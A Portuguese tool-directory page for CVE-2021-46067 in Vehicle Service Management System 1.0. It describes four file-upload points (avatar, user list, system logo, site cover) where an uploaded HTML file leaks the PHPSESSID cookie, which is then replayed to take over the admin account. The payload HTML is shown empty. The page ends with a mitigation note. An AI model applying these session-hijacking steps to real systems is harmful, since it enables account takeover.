Diretório de Ferramentas
Categorias
Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover — CVE-2021-46067 - No Sistema de Gerenciamento de Serviços Veiculares 1.0, um invasor pode roubar os cookies, levando à Assunção Total da Conta. | Kitploit
Ferramentas / GitHub / sanupl / vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover
sanupl/vehicle-service-management-system-multiple-cookie-stealing-leads-to-full-account-takeover Vehicle-Service-Management-System-Multiple-Cookie-Stealing-Leads-to-Full-Account-Takeover CVE-2021-46067 - No Sistema de Gerenciamento de Serviços Veiculares 1.0, um invasor pode roubar os cookies, levando à Assunção Total da Conta.
3 há 4 mesesDescubra as ferramentas mais usadas pela nossa comunidade.
Últimos 7 Dias Últimos 30 Dias
CVE-2021-46067
Exploit Title: Vehicle Service Management System - 'Múltiplo' Roubo de Cookies Leva à Assunção Total de Conta
CVE: CVE-2021-46067
CVSS: 9.8 CRÍTICO
References:
Description: No Vehicle Service Management System 1.0 um invasor pode roubar os cookies, levando à Assunção Total de Conta.
1. Vehicle Service Management System - 'MyAccount' (/admin/?page=user)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salve o código html acima. Ex: Cookie Stealing.html
Na seção Minha Conta, insira todos os detalhes necessários e selecione o arquivo html em Avatar.
Clique no botão Atualizar.
Abra a imagem do avatar em uma nova aba e verifique o status do Webhook.
Recebemos a requisição contendo PHPSESSID.
Copie o valor de PHPSESSID e abra outro navegador.
Visite o painel de administração http://localhost/vehicle_service/admin
Verifique os valores dos cookies e altere o valor de PHPSESSID para o valor copiado.
Agora acesse o painel de administração http://localhost/vehicle_service/admin
Logado com sucesso na conta. Assunção de Conta bem-sucedida.
2. Vehicle Service Management System - 'Lista de Usuários' (/admin/?page=user/manage_user)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salve o código html acima. Ex: Cookie Stealing.html
Na seção Criar Novo Usuário, insira todos os detalhes necessários e selecione o arquivo html em Avatar.
Clique no botão Salvar.
Abra a imagem do avatar em uma nova aba e verifique o status do Webhook.
Recebemos a requisição contendo PHPSESSID.
Copie o valor de PHPSESSID e abra outro navegador.
Visite o painel de administração http://localhost/vehicle_service/admin
Verifique os valores dos cookies e altere o valor de PHPSESSID para o valor copiado.
Agora acesse o painel de administração http://localhost/vehicle_service/admin
Logado com sucesso na conta. Assunção de Conta bem-sucedida.
3. Vehicle Service Management System - 'Configurações - Logotipo do Sistema' (/admin/?page=system_info)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salve o código html acima. Ex: Cookie Stealing.html
Na seção Configurações, insira todos os detalhes necessários e selecione o arquivo html em Logotipo do Sistema.
Clique no botão Atualizar.
Abra a imagem do Logotipo do Sistema em uma nova aba e verifique o status do Webhook.
Recebemos a requisição contendo PHPSESSID.
Copie o valor de PHPSESSID e abra outro navegador.
Visite o painel de administração http://localhost/vehicle_service/admin
Verifique os valores dos cookies e altere o valor de PHPSESSID para o valor copiado.
Agora acesse o painel de administração http://localhost/vehicle_service/admin
Logado com sucesso na conta. Assunção de Conta bem-sucedida.
4. Vehicle Service Management System - 'Configurações - Capa do Site' (/admin/?page=system_info)
Exploit:
Payload: <!DOCTYPE html>
<html>
<title>Cookie Stealing</title>
<body>
</body>
</html>
Salve o código html acima. Ex: Cookie Stealing.html
Na seção Configurações, insira todos os detalhes necessários e selecione o arquivo html em Capa do Site.
Clique no botão Atualizar.
Abra a imagem da Capa do Site em uma nova aba e verifique o status do Webhook.
Recebemos a requisição contendo PHPSESSID.
Copie o valor de PHPSESSID e abra outro navegador.
Visite o painel de administração http://localhost/vehicle_service/admin
Verifique os valores dos cookies e altere o valor de PHPSESSID para o valor copiado.
Agora acesse o painel de administração http://localhost/vehicle_service/admin
Logado com sucesso na conta. Assunção de Conta bem-sucedida.
Impact: Um invasor faz upload de um arquivo html malicioso que redireciona para um site de terceiros e os cookies são expostos na requisição. Isso leva à Assunção Total de Conta.
Mitigation: Recomenda-se validar a funcionalidade de upload de arquivos e realizar verificações secundárias na sessão.